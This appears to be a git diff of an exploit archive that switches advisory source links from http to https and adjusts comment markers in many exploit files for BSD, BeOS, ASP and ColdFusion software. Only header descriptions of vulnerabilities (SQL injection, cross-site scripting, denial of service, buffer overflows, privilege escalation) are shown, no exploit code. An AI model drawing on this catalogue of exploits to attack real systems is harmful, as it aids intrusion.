a/exploits/asp/webapps/38883.txt +++ b/exploits/asp/webapps/38883.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64371/info +source: https://www.securityfocus.com/bid/64371/info EtoShop Dynamic Biz Website Builder (QuickWeb) is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/38884.txt b/exploits/asp/webapps/38884.txt index f5eec3c47..6889a27b0 100644 --- a/exploits/asp/webapps/38884.txt +++ b/exploits/asp/webapps/38884.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64371/info +source: https://www.securityfocus.com/bid/64371/info EtoShop Dynamic Biz Website Builder (QuickWeb) is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. 
diff --git a/exploits/asp/webapps/38935.txt b/exploits/asp/webapps/38935.txt index 5141bbdfe..76bdeacc2 100644 --- a/exploits/asp/webapps/38935.txt +++ b/exploits/asp/webapps/38935.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64572/info +source: https://www.securityfocus.com/bid/64572/info CMS Afroditi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/39106.txt b/exploits/asp/webapps/39106.txt index a1b4f380f..1548145cc 100644 --- a/exploits/asp/webapps/39106.txt +++ b/exploits/asp/webapps/39106.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/65740/info +source: https://www.securityfocus.com/bid/65740/info eshtery CMS is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input. diff --git a/exploits/asp/webapps/39187.txt b/exploits/asp/webapps/39187.txt index 001579cab..0750749ce 100644 --- a/exploits/asp/webapps/39187.txt +++ b/exploits/asp/webapps/39187.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67442/info +source: https://www.securityfocus.com/bid/67442/info CIS Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/atheos/local/21282.c b/exploits/atheos/local/21282.c index 57e0305cb..01cef9f95 100644 --- a/exploits/atheos/local/21282.c +++ b/exploits/atheos/local/21282.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/4051/info +source: https://www.securityfocus.com/bid/4051/info AtheOS is a freely available, open source operating system. It is distributed under the GPL, and maintained by the AtheOS project. diff --git a/exploits/beos/dos/19938.txt b/exploits/beos/dos/19938.txt index de6b7590a..cd937ec6c 100644 --- a/exploits/beos/dos/19938.txt +++ b/exploits/beos/dos/19938.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1222/info +source: https://www.securityfocus.com/bid/1222/info BeOS is vulnerable to a remote TCP fragmentation attack that will crash the target system, requiring a reboot. diff --git a/exploits/beos/local/19840.txt b/exploits/beos/local/19840.txt index 669feaade..ceed515c8 100644 --- a/exploits/beos/local/19840.txt +++ b/exploits/beos/local/19840.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1098/info +source: https://www.securityfocus.com/bid/1098/info A direct system call containing invalid parameters through int 0x25 will cause the BeOS to crash. Reboot of the machine is required in order to regain normal functionality. diff --git a/exploits/beos/local/19841.casl b/exploits/beos/local/19841.casl index f178e4fc5..7c3367eb3 100644 --- a/exploits/beos/local/19841.casl +++ b/exploits/beos/local/19841.casl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1100/info +source: https://www.securityfocus.com/bid/1100/info The networking process in BeOS can crash if certain malformed packets are transmitted to it. If the length field is set to a number less than the total length of the IP and protocol (TCP or UDP) headers alone, the process will halt and require manual restarting to regain normal functionality. For TCP, the combined TCP and IP header length is 40, and for UDP the combined UDP and IP header length is 28. diff --git a/exploits/beos/remote/20404.txt b/exploits/beos/remote/20404.txt index 95625e9d9..36a7da127 100644 --- a/exploits/beos/remote/20404.txt +++ b/exploits/beos/remote/20404.txt @@ -1,4 +1,4 @@ -source : http://www.securityfocus.com/bid/1944/info +source : https://www.securityfocus.com/bid/1944/info RobinHood is a HTTP/1.1 web server based upon libHTTP and is designed for the BeOS platform. diff --git a/exploits/bsd/dos/16064.c b/exploits/bsd/dos/16064.c index 85a2118e3..89a80e64f 100644 --- a/exploits/bsd/dos/16064.c +++ b/exploits/bsd/dos/16064.c 
@@ -1,3 +1,4 @@ +/* # Exploit Title: FreeBSD local denial of service - forced reboot # Date: 28. January 2011 # Author: Kingcope @@ -7,6 +8,8 @@ This source code when compiled and executed will reboot at least FreeBSD 8.0-RELEASE because of a null pointer dereference. +*/ + #include #include diff --git a/exploits/bsd/dos/19117.c b/exploits/bsd/dos/19117.c index c82bae737..5a760c61c 100644 --- a/exploits/bsd/dos/19117.c +++ b/exploits/bsd/dos/19117.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/147/info +source: https://www.securityfocus.com/bid/147/info The "Smurf" denial of service exploits the existance, and forwarding of, packets sent to IP broadcast addreses. By creating an ICMP echo request packet, with the source address set to an IP within the network to be attacked, and the destination address the IP broadcast address of a network which will forward and respond to ICMP echo packets sent to broadcast. Each packet sent in to the network being used to conduct the attack will be responded to by any machine which will respond to ICMP on the broadcast address. Therefore, a single packet can result in an overwhelming response count, all of which are directed to the network the attacker has forged as the source. This can result in significant bandwidth loss. */ diff --git a/exploits/bsd/dos/19423.c b/exploits/bsd/dos/19423.c index 0834d1b04..9dd3fbf19 100644 --- a/exploits/bsd/dos/19423.c +++ b/exploits/bsd/dos/19423.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/526/info +source: https://www.securityfocus.com/bid/526/info Operating systems with a shared memory implementation based on or influenced by the 4.4BSD code may be vulnerable to a denial of service attack The problem exists because you can mmap() or shmget() as much memory as you'd like bypassing rlimits. When you trigger pagefaults, the system will begin allocating the memory (it's not actually allocated at first) and run out. With System V IPC the memory remains allocated even after the process has stopped running. */ diff --git a/exploits/bsd/dos/19488.c b/exploits/bsd/dos/19488.c index 968eb9632..841ab8663 100644 --- a/exploits/bsd/dos/19488.c +++ b/exploits/bsd/dos/19488.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/622/info +// source: https://www.securityfocus.com/bid/622/info A denial of service attack exists that affects FreeBSD, NetBSD and OpenBSD, and potentially other operating systems based in some part on BSD. It is believed that all versions of these operating systems are vulnerable. The vulnerability is related to setting socket options regarding the size of the send and receive buffers on a socketpair. By setting them to certain values, and performing a write the size of the value the options have been set to, FreeBSD can be made to panic. NetBSD and OpenBSD do not panic, but network applications will stop responding. diff --git a/exploits/bsd/dos/19564.c b/exploits/bsd/dos/19564.c index 5d4062181..42724f5ed 100644 --- a/exploits/bsd/dos/19564.c +++ b/exploits/bsd/dos/19564.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/736/info +// source: https://www.securityfocus.com/bid/736/info It is possible to remotely lock Axent Raptor firewalls by sending them packets with malformed IP options fields. According to an advisory posted to bugtraq by the perdue CERIAS labs, setting the SECURITY and TIMESTAMP IP options length to 0 can cause an infinite loop to occur within the code that handles the options (resulting in the software freezing). A consequence of this is a remote denial of service. diff --git a/exploits/bsd/dos/19896.c b/exploits/bsd/dos/19896.c index 7ae39a00c..c3357cffe 100644 --- a/exploits/bsd/dos/19896.c +++ b/exploits/bsd/dos/19896.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1173/info +// source: https://www.securityfocus.com/bid/1173/info A vulnerability exists in the 1.4.x NetBSD kernel that may allow remote attackers to cause the machine to kernel panic on certain architectures. By sending a packet to a machine running the Alpha or SPARC versions of NetBSD, with an unaligned IP timestamp option, it is possible to cause the kernel to perform an unaligned memory access. This will cause a panic, causing the machine to reboot. diff --git a/exploits/bsd/dos/19982.c b/exploits/bsd/dos/19982.c index d49476a25..952624668 100644 --- a/exploits/bsd/dos/19982.c +++ b/exploits/bsd/dos/19982.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1296/info +// source: https://www.securityfocus.com/bid/1296/info A denial of service attack exists that affects FreeBSD, NetBSD and OpenBSD. It is believed that all versions of these operating systems are vulnerable. The vulnerability is related to setting socket options regarding the size of the send and receive buffers on a socketpair. By setting them to certain values, and performing a write the size of the value the options have been set to, FreeBSD can be made to panic. NetBSD and OpenBSD do not panic, but network applications will stop responding. 
diff --git a/exploits/bsd/dos/21077.c b/exploits/bsd/dos/21077.c index abc78f0dd..b11a55b92 100644 --- a/exploits/bsd/dos/21077.c +++ b/exploits/bsd/dos/21077.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/3220/info +source: https://www.securityfocus.com/bid/3220/info It has been reported that there is a locally exploitable vulnerability in BSDI. diff --git a/exploits/bsd/dos/31333.txt b/exploits/bsd/dos/31333.txt index 81b88e335..4809ce2b1 100644 --- a/exploits/bsd/dos/31333.txt +++ b/exploits/bsd/dos/31333.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28090/info +source: https://www.securityfocus.com/bid/28090/info BSD PPP is prone to a local denial-of-service vulnerability because it fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/bsd/dos/31550.c b/exploits/bsd/dos/31550.c index 10c9e1dc1..b5e9859e3 100644 --- a/exploits/bsd/dos/31550.c +++ b/exploits/bsd/dos/31550.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28479/info +// source: https://www.securityfocus.com/bid/28479/info Multiple BSD platforms are prone to an integer-overflow weakness. diff --git a/exploits/bsd/dos/33318.txt b/exploits/bsd/dos/33318.txt index 4e71028de..8f08054e6 100644 --- a/exploits/bsd/dos/33318.txt +++ b/exploits/bsd/dos/33318.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36884/info +source: https://www.securityfocus.com/bid/36884/info OpenBSD and NetBSD are prone to a denial-of-service vulnerability because they fail to properly parse format strings to the 'printf(1)' function. diff --git a/exploits/bsd/dos/33319.txt b/exploits/bsd/dos/33319.txt index 31a9d9350..4051a0578 100644 --- a/exploits/bsd/dos/33319.txt +++ b/exploits/bsd/dos/33319.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36885/info +source: https://www.securityfocus.com/bid/36885/info Multiple BSD distributions are prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index. diff --git a/exploits/bsd/dos/33708.c b/exploits/bsd/dos/33708.c index 1c87c79e3..beb4f09b9 100644 --- a/exploits/bsd/dos/33708.c +++ b/exploits/bsd/dos/33708.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38559/info +// source: https://www.securityfocus.com/bid/38559/info The FreeBSD and OpenBSD 'ftpd' service is prone to a denial-of-service vulnerability because of a NULL-pointer dereference. diff --git a/exploits/bsd/dos/38059.c b/exploits/bsd/dos/38059.c index f6a756ecb..8646b8919 100644 --- a/exploits/bsd/dos/38059.c +++ b/exploits/bsd/dos/38059.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56671/info +// source: https://www.securityfocus.com/bid/56671/info OpenBSD is prone to a remote denial-of-service vulnerability. diff --git a/exploits/bsd/local/15206.c b/exploits/bsd/local/15206.c index 8f555f190..d0cf8de59 100644 --- a/exploits/bsd/local/15206.c +++ b/exploits/bsd/local/15206.c @@ -1,5 +1,5 @@ /* - * source: http://www.securityfocus.com/bid/43060/info + * source: https://www.securityfocus.com/bid/43060/info * 18.08.2010, babcia padlina * FreeBSD 7.0 - 7.2 pseudofs null ptr dereference exploit * diff --git a/exploits/bsd/local/19411.txt b/exploits/bsd/local/19411.txt index 8de597941..0dc5c7566 100644 --- a/exploits/bsd/local/19411.txt +++ b/exploits/bsd/local/19411.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/510/info +source: https://www.securityfocus.com/bid/510/info In 4.4BSD derivatives there are four secure levels that provide for added filesystem security (among other things) over and above the regular unix permission systems. Part of the secure levels are the system of file flags which include immutable and append-only flags. In secure level 0, these flags are irrelevant. The vulnerability lies in the inherent flaw with security level 1. In security level 1, the file flags are acknowledged; files such as /usr/bin/login can be set immutable and so forth -- however, umounted partitions/devices can be freely written to and modified (by root, of course). Stealth has written a tool which allows for an intruder who has gained root to bypass security level 1 through writing directly to the device and clearing the file flags. The tool also sets the CLEAN flag in the filesystem which fools the computer into thinking the modified device is clean avoiding detection at bootup. A hypothetical situation for exploit of this vulnerability is as follows, diff --git a/exploits/bsd/local/19545.c b/exploits/bsd/local/19545.c index e88f24dd9..29c98940f 100644 --- a/exploits/bsd/local/19545.c +++ b/exploits/bsd/local/19545.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/707/info +source: https://www.securityfocus.com/bid/707/info Due to insufficient bounds checking on arguments (in this case -C) which are supplied by users, it is possible to overwrite the internal stack space of the lpr program while it is executing. This can allow an intruder to cause lpr to execute arbitrary commands by supplying a carefully designed argument to lpr. These commands will be run with the privileges of the lpr program. When lpr is installed setuid or setgid, it may allow intruders to gain those privileges. */ diff --git a/exploits/bsd/local/19726.c b/exploits/bsd/local/19726.c index b28f5dbef..31ee57772 100644 
--- a/exploits/bsd/local/19726.c +++ b/exploits/bsd/local/19726.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/940/info +// source: https://www.securityfocus.com/bid/940/info Certain BSD derivative operating systems use an implantation of the /proc filesystem which is vulnerable to attack from malicious local users. This attack will gain the user root access to the host. diff --git a/exploits/bsd/local/20191.c b/exploits/bsd/local/20191.c index 42141a3f1..4340abfee 100644 --- a/exploits/bsd/local/20191.c +++ b/exploits/bsd/local/20191.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1641/info +// source: https://www.securityfocus.com/bid/1641/info Various format string vulnerabilities exist in versions 3.9.5 and prior of 'screen' that may allow local users to elevate their privileges. If screen is setuid root, it is possible to alter the contents of the variable which stores the user id. diff --git a/exploits/bsd/local/21407.c b/exploits/bsd/local/21407.c index e1545e6f1..eff7a2fc9 100644 --- a/exploits/bsd/local/21407.c +++ b/exploits/bsd/local/21407.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/4568/info +source: https://www.securityfocus.com/bid/4568/info It has been reported that BSD-based kernels do not check to ensure that the C library standard I/O file descriptors 0-2 are valid open files before exec()ing setuid images. Consequently, I/O that are opened by a setuid process may be assigned file descriptors equivelent to those used by the C library as 'standard input','standard output', and 'standard error'. diff --git a/exploits/bsd/local/21669.pl b/exploits/bsd/local/21669.pl index 2e0815116..1f4e50103 100755 --- a/exploits/bsd/local/21669.pl +++ b/exploits/bsd/local/21669.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5355/info +source: https://www.securityfocus.com/bid/5355/info A vulnerability has been reported in some versions of the pppd daemon included with multiple BSD distributions. 
diff --git a/exploits/bsd/local/21881.txt b/exploits/bsd/local/21881.txt index 7c91daea2..5df1b067b 100644 --- a/exploits/bsd/local/21881.txt +++ b/exploits/bsd/local/21881.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5837/info +source: https://www.securityfocus.com/bid/5837/info Rogue is a game included with BSD distributions including FreeBSD and NetBSD. diff --git a/exploits/bsd/local/22811.c b/exploits/bsd/local/22811.c index ded27e3e7..78a4092ea 100644 --- a/exploits/bsd/local/22811.c +++ b/exploits/bsd/local/22811.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7982/info +// source: https://www.securityfocus.com/bid/7982/info A buffer overflow vulnerability has been reported for Abuse-SDL that may result in the execution of attacker-supplied code. The vulnerability exists due to insufficient bounds checking performed on certain command-line options. diff --git a/exploits/bsd/local/23062.c b/exploits/bsd/local/23062.c index 6fc4131d6..01c60e3d7 100644 --- a/exploits/bsd/local/23062.c +++ b/exploits/bsd/local/23062.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8501/info +// source: https://www.securityfocus.com/bid/8501/info Monop (included in bsd-games) is prone to a locally exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of player names. Monop is typically installed setgid games, so it is possible to exploit this issue to execute arbitrary code with these privileges. diff --git a/exploits/bsd/local/23063.c b/exploits/bsd/local/23063.c index 3237528a4..f27a509de 100644 --- a/exploits/bsd/local/23063.c +++ b/exploits/bsd/local/23063.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8501/info +// source: https://www.securityfocus.com/bid/8501/info Monop (included in bsd-games) is prone to a locally exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of player names. Monop is typically installed setgid games, so it is possible to exploit this issue to execute arbitrary code with these privileges. diff --git a/exploits/bsd/local/23655.txt b/exploits/bsd/local/23655.txt index 3c0b9d06b..f67710798 100644 --- a/exploits/bsd/local/23655.txt +++ b/exploits/bsd/local/23655.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9586/info +source: https://www.securityfocus.com/bid/9586/info A vulnerability has been reported to reside in the 'shmat()' system call used in the BSD kernel. Exploiting this issue may allow a local attacker to inject instructions into the memory of a privileged process. diff --git a/exploits/bsd/local/24015.c b/exploits/bsd/local/24015.c index e36f6f910..3c36524d5 100644 --- a/exploits/bsd/local/24015.c +++ b/exploits/bsd/local/24015.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10165/info +// source: https://www.securityfocus.com/bid/10165/info bsd-games mille is prone to a locally exploitable buffer overrun vulnerability. This issue is due to insufficient bounds checking when the user inputs a file name when saving a game. diff --git a/exploits/bsd/local/24113.c b/exploits/bsd/local/24113.c index 77f575d1b..a8869eb4d 100644 --- a/exploits/bsd/local/24113.c +++ b/exploits/bsd/local/24113.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10320/info +// source: https://www.securityfocus.com/bid/10320/info A vulnerability has been reported that affects Systrace on NetBSD, as well as the FreeBSD port by Vladimir Kotal. diff --git a/exploits/bsd/local/30484.txt b/exploits/bsd/local/30484.txt index 631eedaa0..63de627d0 100644 --- a/exploits/bsd/local/30484.txt +++ b/exploits/bsd/local/30484.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25258/info +source: https://www.securityfocus.com/bid/25258/info Systrace is prone to multiple concurrency vulnerabilities due to its implementation of system call wrappers. This problem can result in a race condition between a user thread and the kernel. diff --git a/exploits/bsd/local/33229.c b/exploits/bsd/local/33229.c index 6c4a28523..2fe1abd87 100644 --- a/exploits/bsd/local/33229.c +++ b/exploits/bsd/local/33229.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/36430/info +source: https://www.securityfocus.com/bid/36430/info NetBSD is prone to a local privilege-escalation vulnerability. diff --git a/exploits/bsd/local/36296.pl b/exploits/bsd/local/36296.pl index 06b19cb5f..3879047d5 100755 --- a/exploits/bsd/local/36296.pl +++ b/exploits/bsd/local/36296.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50607/info +source: https://www.securityfocus.com/bid/50607/info OpenPAM is prone to a local privilege-escalation vulnerability. diff --git a/exploits/bsd/remote/19039.txt b/exploits/bsd/remote/19039.txt index b8be9f0ec..d3e286b61 100644 --- a/exploits/bsd/remote/19039.txt +++ b/exploits/bsd/remote/19039.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2/info +source: https://www.securityfocus.com/bid/2/info fingerd is a remote user information server that implements the protocol defined in RFC742. There exists a buffer diff --git a/exploits/bsd/remote/19924.c b/exploits/bsd/remote/19924.c index 4e6fb012f..f2747d3c1 100644 --- a/exploits/bsd/remote/19924.c +++ b/exploits/bsd/remote/19924.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1220/info +// source: https://www.securityfocus.com/bid/1220/info Several buffer overflow vulnerabilities exist in Kerberos 5 implmenetations due to buffer overflows in the Kerberos 4 compatability code. These include MIT Kerberos 5 releases 1.0.x, 1.1 and 1.1.1, MIT Kerberos 4 patch level 10 (and, most likely, prior releases), and Cygnus KerbNet and Network Security (CNS). The main source of problems is due to a buffer overflow in the krb_rd_req() library function. This function is used by every application that supports Kerberos 4 authentication, including, but not limited to, kshrd, klogin, telnetd, ftpd, rkinitd, v4rcp and kpopd. Therefore, it is possible for a remote attacker to exploit this vulnerability and gain root access on affected machines, or obtain root level access once local. diff --git a/exploits/bsd/remote/20731.c b/exploits/bsd/remote/20731.c index 0f652a128..025709606 100644 --- a/exploits/bsd/remote/20731.c +++ b/exploits/bsd/remote/20731.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2548/info +// source: https://www.securityfocus.com/bid/2548/info The BSD ftp daemon and derivatives (such as IRIX ftpd or the ftp daemon shipped with Kerberos 5) contain a number of buffer overflows that may lead to a compromise of root access to malicious users. diff --git a/exploits/bsd/remote/21440.c b/exploits/bsd/remote/21440.c index 4c626e238..38023c495 100644 --- a/exploits/bsd/remote/21440.c +++ b/exploits/bsd/remote/21440.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4701/info +// source: https://www.securityfocus.com/bid/4701/info The ISC DHCPD (Dynamic Host Configuration Protocol) is a collection of software implementing the DHCP protocol. It is available for a range of operating systems, including BSD and Solaris. diff --git a/exploits/bsd/remote/22131.pl b/exploits/bsd/remote/22131.pl index 332e877f6..b13bae066 100755 --- a/exploits/bsd/remote/22131.pl 
+++ b/exploits/bsd/remote/22131.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6535/info +source: https://www.securityfocus.com/bid/6535/info Network device drivers for several vendors have been reported to disclose potentially sensitive information to attackers. diff --git a/exploits/bsd/remote/35919.c b/exploits/bsd/remote/35919.c index 9d5118b41..43836794d 100644 --- a/exploits/bsd/remote/35919.c +++ b/exploits/bsd/remote/35919.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48528/info +// source: https://www.securityfocus.com/bid/48528/info NetBSD is prone to a stack-based buffer-overflow vulnerability affecting multiple functions in the 'libc/net' library. diff --git a/exploits/cfm/dos/28100.txt b/exploits/cfm/dos/28100.txt index e4ed04098..78daef289 100644 --- a/exploits/cfm/dos/28100.txt +++ b/exploits/cfm/dos/28100.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18624/info +source: https://www.securityfocus.com/bid/18624/info BlueDragon is prone to a remote denial-of-service vulnerability. This issue is due to the application's failure to efficiently handle malformed GET requests. diff --git a/exploits/cfm/remote/21548.txt b/exploits/cfm/remote/21548.txt index 6642c4f14..1ca1a4d90 100644 --- a/exploits/cfm/remote/21548.txt +++ b/exploits/cfm/remote/21548.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5011/info +source: https://www.securityfocus.com/bid/5011/info ColdFusion MX is prone to cross site scripting attacks. diff --git a/exploits/cfm/webapps/21493.txt b/exploits/cfm/webapps/21493.txt index 356e08a86..f585eb771 100644 --- a/exploits/cfm/webapps/21493.txt +++ b/exploits/cfm/webapps/21493.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4882/info +source: https://www.securityfocus.com/bid/4882/info Gafware's CFXImage is a custom tag for ColdFusion. diff --git a/exploits/cfm/webapps/22486.txt b/exploits/cfm/webapps/22486.txt index 528cb06b3..b061a8076 100644 
--- a/exploits/cfm/webapps/22486.txt +++ b/exploits/cfm/webapps/22486.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7338/info +source: https://www.securityfocus.com/bid/7338/info It has been reported that multiple input validation errors exist in the index.cfm file included with InstaBoard. Because of this issue, remote attackers may launch SQL injection attacks through the software. diff --git a/exploits/cfm/webapps/22544.txt b/exploits/cfm/webapps/22544.txt index b9d5d319f..b76edba88 100644 --- a/exploits/cfm/webapps/22544.txt +++ b/exploits/cfm/webapps/22544.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7443/info +source: https://www.securityfocus.com/bid/7443/info A vulnerability has been reported for Macromedia ColdFusion MX that may reveal the physical path information to attackers. diff --git a/exploits/cfm/webapps/23256.txt b/exploits/cfm/webapps/23256.txt index fba376e8e..42f75cfa2 100644 --- a/exploits/cfm/webapps/23256.txt +++ b/exploits/cfm/webapps/23256.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8840/info +source: https://www.securityfocus.com/bid/8840/info It has been reported that Macromedia ColdFusion MX may be prone to a cross-site scripting vulnerability due to improper handling of error messages generated by the underlying database. This problem may be exploited by an attacker to construct a malicious link containing HTML or script code that may be rendered in a user's browser upon visiting that link. If successful, an attacker may obtain access to cookie-based authentication credentials that may lead to other attacks. This attack would occur in the security context of the vulnerable site. diff --git a/exploits/cfm/webapps/24081.txt b/exploits/cfm/webapps/24081.txt index 9dddcaa32..dc3c52671 100644 --- a/exploits/cfm/webapps/24081.txt +++ b/exploits/cfm/webapps/24081.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10276/info +source: https://www.securityfocus.com/bid/10276/info It has been reported that FuseTalk is affected by an administrator command execution vulnerability in the adduser.cfm script. This issue is due to a failure of the application to properly validate the origin of user supplied data. diff --git a/exploits/cfm/webapps/24680.txt b/exploits/cfm/webapps/24680.txt index cbaf7f21f..fa368b536 100644 --- a/exploits/cfm/webapps/24680.txt +++ b/exploits/cfm/webapps/24680.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11407/info +source: https://www.securityfocus.com/bid/11407/info FuseTalk Forum is reported prone to multiple input validation vulnerabilities. These issues may allow a remote attacker to carry out cross-site scripting attacks. The cause of these issues is insufficient sanitization of user-supplied data. diff --git a/exploits/cfm/webapps/25982.txt b/exploits/cfm/webapps/25982.txt index 2ee308b7f..7499a83f0 100644 --- a/exploits/cfm/webapps/25982.txt +++ b/exploits/cfm/webapps/25982.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14266/info +source: https://www.securityfocus.com/bid/14266/info A cross-site scripting vulnerability affects Simple Message Board. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/25983.txt b/exploits/cfm/webapps/25983.txt index 0a9d82b60..74a0dba71 100644 --- a/exploits/cfm/webapps/25983.txt +++ b/exploits/cfm/webapps/25983.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14267/info +source: https://www.securityfocus.com/bid/14267/info A cross-site scripting vulnerability affects Simple Message Board. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/25984.txt b/exploits/cfm/webapps/25984.txt index d9ac00d7a..efd856c1d 100644 --- a/exploits/cfm/webapps/25984.txt 
+++ b/exploits/cfm/webapps/25984.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14268/info +source: https://www.securityfocus.com/bid/14268/info A cross-site scripting vulnerability affects Simple Message Board. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/25985.txt b/exploits/cfm/webapps/25985.txt index 84937a26f..21759ff13 100644 --- a/exploits/cfm/webapps/25985.txt +++ b/exploits/cfm/webapps/25985.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14269/info +source: https://www.securityfocus.com/bid/14269/info A cross-site scripting vulnerability affects Simple Message Board. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/26060.txt b/exploits/cfm/webapps/26060.txt index 6354cc17c..d29344437 100644 --- a/exploits/cfm/webapps/26060.txt +++ b/exploits/cfm/webapps/26060.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14440/info +source: https://www.securityfocus.com/bid/14440/info CFBB is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/26065.txt b/exploits/cfm/webapps/26065.txt index 62004c73b..8cfd0056f 100644 --- a/exploits/cfm/webapps/26065.txt +++ b/exploits/cfm/webapps/26065.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14460/info +source: https://www.securityfocus.com/bid/14460/info Fusebox is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/26763.txt b/exploits/cfm/webapps/26763.txt index c34dcc99f..25faf875c 100644 --- a/exploits/cfm/webapps/26763.txt +++ b/exploits/cfm/webapps/26763.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15774/info +source: https://www.securityfocus.com/bid/15774/info CFMagic Products are prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/cfm/webapps/26764.txt b/exploits/cfm/webapps/26764.txt index 0f17b7d12..914d868b1 100644 --- a/exploits/cfm/webapps/26764.txt +++ b/exploits/cfm/webapps/26764.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15774/info +source: https://www.securityfocus.com/bid/15774/info CFMagic Products are prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/cfm/webapps/26765.txt b/exploits/cfm/webapps/26765.txt index 61aef8556..760963fb3 100644 --- a/exploits/cfm/webapps/26765.txt +++ b/exploits/cfm/webapps/26765.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15774/info +source: https://www.securityfocus.com/bid/15774/info CFMagic Products are prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/cfm/webapps/26766.txt b/exploits/cfm/webapps/26766.txt index 304349713..0f657c889 100644 --- a/exploits/cfm/webapps/26766.txt +++ b/exploits/cfm/webapps/26766.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15777/info +source: https://www.securityfocus.com/bid/15777/info CF_Nuke is prone to a local file include vulnerability. This is due to a lack of sanitization of user-supplied input. diff --git a/exploits/cfm/webapps/26767.txt 